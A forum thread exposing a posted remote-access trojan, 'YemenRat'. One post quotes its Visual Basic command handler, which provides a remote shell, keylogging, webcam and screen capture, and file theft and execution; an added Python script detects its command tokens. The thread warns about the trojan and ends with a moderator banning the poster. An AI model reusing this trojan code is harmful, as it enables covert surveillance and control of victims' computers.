Thread: YemenRat open source

  1. #1

    Thread Starter
    Banned
    Join Date
    Sep 2020
    Posts
    1

    Post YemenRat open source

    password : 152
    Last edited by FunkyDexter; Sep 10th, 2020 at 08:10 AM.

  2. #2
    Frenzied Member
    Join Date
    Dec 2008
    Location
    Melbourne Australia
    Posts
    1,487

    Re: YemenRat open source

    Is there a prize for the first person to guess (and post) what it does?

  3. #3
    Fanatic Member
    Join Date
    Jan 2015
    Posts
    596

    Re: YemenRat open source

    I opened the project in notepad (not VB), and I can't trust the project.

    I suggest not opening it and running it in VB.

  4. #4
    PowerPoster
    Join Date
    Feb 2017
    Posts
    5,064

    Re: YemenRat open source

    Client\frmOptions.frm:

    Code:
    MkDir (App.Path & "\" & "Victims")

    When you read "for educational purposes", suspect.

  5. #5
    PowerPoster wqweto's Avatar
    Join Date
    May 2011
    Location
    Sofia, Bulgaria
    Posts
    5,152

    Re: YemenRat open source

    I extracted it w/ no warnings from Windows Defender and these are all the commands the server supports

    Code:
            Case "|REQUESTID|"
                'PW = sData(2)
                Call SendData("|INFO|" & Chr(0) & Info.VictimName & Chr(0) & "0.0.0.0" & Chr(0) & _
                Environ("username") & Chr(0) & Environ("computername") & Chr(0) & _
                GetWindowsVersion & Chr(0) & GetMemory & Chr(0) & GetCPU & Chr(0) & _
                Admin & Chr(0) & GetSecurity & Chr(0) & GetCountry & Chr(0) & _
                GetActiveWindow)
                
            Case "|SHOW COMMAND|"
                Call SendData("|SHOW COMMAND|")
                
            Case "|GETDRIVES|"
                Call SendData("|GETDRIVES|" & Chr(0) & GetDrives)
            
            Case "|SCREEN CAPTURE|"
                frmMain.Pic.Height = sData(2)
                frmMain.Pic.Width = sData(3)
                
                If sData(4) > 100 Then
                    sData(4) = 30
                End If
                
                Call ScreenCapture(sData(4))
                Call SendPoto(Environ("temp") & "\" & frmMain.hwnd & "SC.Yem")
            
            Case "|BROWSING|"
                Data = EnumFiles(sData(2))
                Call SendData("|BROWSING|" & Chr(0) & Data)
                
            Case "|GET PROCESS|"
                Call SendData("|GET PROCESS|" & Chr(0) & GetProcess)
                
            Case "|KILL PROCESS|"
                Call KillProcess(sData(2))
                
            Case "|GET WEBCAM DRIVE|"
                Call SendData("|GET WEBCAM DRIVE|" & Chr(0) & GetWebCamDrives)
                
            Case "|WEBCAM CAPTURE|"
                frmMain.FsR.Enabled = False
                frmMain.Pic.Height = 4000
                frmMain.Pic.Width = 5000
                
                If sData(2) > 100 Then
                    sData(2) = 30
                End If
                
                If WebCamConnecter Then
                    If WebCamCapturer Then
                        SaveJPG frmMain.Pic.Image, (Environ("temp") & "\" & frmMain.hwnd & "WC.Yem"), sData(2)
                        Call SendWebcam(Environ("temp") & "\" & frmMain.hwnd & "WC.Yem")
                    Else
                        GoTo CamErr:
                    End If
                Else
                    GoTo CamErr:
                End If
                
                Exit Sub
    CamErr: Call SendData("|WEBCAM ERROR|")
                
            Case "|PING|"
                NoSignle = Timer
                Call SendData("|PING|" & Chr(0) & GetActiveWindow)
                
            Case "|REOMTE SHELL|"
                Call SendData("|REOMTE SHELL|" & Chr(0) & ExecDOS(sData(2)))
                
            Case "|NEW DIRECTORY|"
                Create_Folder sData(2), sData(3): DoEvents: Data = EnumFiles(sData(2))
                Call SendData("|BROWSING|" & Chr(0) & Data)
                
            Case "|DOWNLOAD FILE|"
                Call SendFile(sData(2))
                
            Case "|GET LIVE KEYS|"
                Live_Keys = True
                
            Case "|GET LOG|"
                Call SendLog(App.Path & "\" & "Klg.Yem")
                
            Case "|DELETE LOG|"
                SetAttr App.Path & "\" & "Klg.Yem", vbNormal
                Kill App.Path & "\" & "Klg.Yem"
                
            Case "|SIZE LOG|"
                Call SendData("|SIZE LOG|" & Chr(0) & FileLen(App.Path & "\" & "Klg.Yem"))
                
            Case "|RUN FILE|"
                ShellExecute 0, "open", sData(2), 0, 0, 2
                
            Case "|DELETE FILE|"
                Delete_File sData(2), sData(3): DoEvents: Data = EnumFiles(sData(2))
                Call SendData("|BROWSING|" & Chr(0) & Data)
                
            Case "|RENAME FILE|"
                ReName_File sData(2), sData(3), sData(4): DoEvents: Data = EnumFiles(sData(2))
                Call SendData("|BROWSING|" & Chr(0) & Data)
            
            Case "|SEND FILE|"
                Dim RFnum As Integer
                '===================
                sData = Split(oData, Chr(0), 5)
                RFnum = FreeFile
                Open sData(2) & sData(3) For Binary As #RFnum
                Put #RFnum, LOF(RFnum) + 1, sData(4)
                Close #RFnum
                Call SendData("|NEXT PART|")
                
            Case "|UNLOAD|"
                Call Reset
                
            Case "|CHECK FILE SIZE|"
                Call Get_File_Size(sData(2), sData(3))
                
            Case "|RESUME DOWNLOAD|"
                Call SendFile(sData(2), sData(3))
                
            Case "|GET INFO|"
                Call Information
                
            Case "|CLOSE SERVER|"

    Perfectly aimed at intimidating victims with screen capture, password key-logging, cam pictures and leeching files.

    cheers,
    </wqw>
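
A defender's reading of the command list in post #5, as an added example that is not part of the thread or of the posted project: it flags payloads containing the quoted command tokens and recognises the `.Yem` file names the snippet writes. The sample payloads and the suspicion threshold are constructed assumptions, and the project's message framing is not shown in the thread, so the scan does not depend on it.

```python
import re

# Tokens copied from the Select Case block in post #5, grouped by capability.
# "|REOMTE SHELL|" keeps the source's misspelling: that is the string to match.
TOKENS = {
    "surveillance": ["|SCREEN CAPTURE|", "|WEBCAM CAPTURE|", "|GET WEBCAM DRIVE|",
                     "|GET LIVE KEYS|", "|GET LOG|", "|SIZE LOG|", "|DELETE LOG|"],
    "execution": ["|REOMTE SHELL|", "|RUN FILE|", "|KILL PROCESS|"],
    "file_access": ["|GETDRIVES|", "|BROWSING|", "|DOWNLOAD FILE|", "|SEND FILE|",
                    "|DELETE FILE|", "|RENAME FILE|", "|NEW DIRECTORY|",
                    "|CHECK FILE SIZE|", "|RESUME DOWNLOAD|"],
    "session": ["|REQUESTID|", "|INFO|", "|PING|", "|GET INFO|", "|GET PROCESS|",
                "|SHOW COMMAND|", "|NEXT PART|", "|WEBCAM ERROR|", "|UNLOAD|",
                "|CLOSE SERVER|"],
}

# Temp/app-path artifacts named in the snippet: <hwnd>SC.Yem, <hwnd>WC.Yem, Klg.Yem.
ARTIFACT = re.compile(r"(?:^|[\\/])(?:-?\d+(SC|WC)|(Klg))\.Yem$", re.IGNORECASE)
KINDS = {"SC": "screen capture", "WC": "webcam capture", "KLG": "keystroke log"}


def scan_payload(data: bytes) -> dict:
    """Report which command tokens occur in a captured payload."""
    found, nul_delimited = {}, False
    for category, tokens in TOKENS.items():
        for tok in tokens:
            raw = tok.encode("ascii")
            if raw in data:
                found.setdefault(category, []).append(tok)
                # Fields are joined with Chr(0), so token + NUL is a stronger signal.
                nul_delimited = nul_delimited or (raw + b"\x00") in data
    distinct = sum(len(v) for v in found.values())
    # Assumed threshold: two distinct tokens, or one followed by a NUL separator.
    return {"found": found, "suspicious": distinct >= 2 or nul_delimited}


def artifact_kind(path: str):
    """Classify a file path as one of the snippet's on-disk artifacts, else None."""
    m = ARTIFACT.search(path)
    return KINDS[(m.group(1) or m.group(2)).upper()] if m else None


# Constructed sample data (not captured traffic).
SAMPLE = b"|INFO|\x00PC1\x000.0.0.0\x00alice\x00|PING|\x00Notepad"
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"
```

A single token with no NUL after it (for example, this thread quoted in a web page) is reported in `found` but not marked suspicious.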

  6. #6
    Super Moderator FunkyDexter's Avatar
    Join Date
    Apr 2005
    Location
    An obscure body in the SK system. The inhabitants call it Earth
    Posts
    7,902

    Re: YemenRat open source

    Have deleted it and banned the user. Thanks for bringing it to our attention.
    The best argument against democracy is a five minute conversation with the average voter - Winston Churchill

    Hadoop actually sounds more like the way they greet each other in Yorkshire - Inferrd
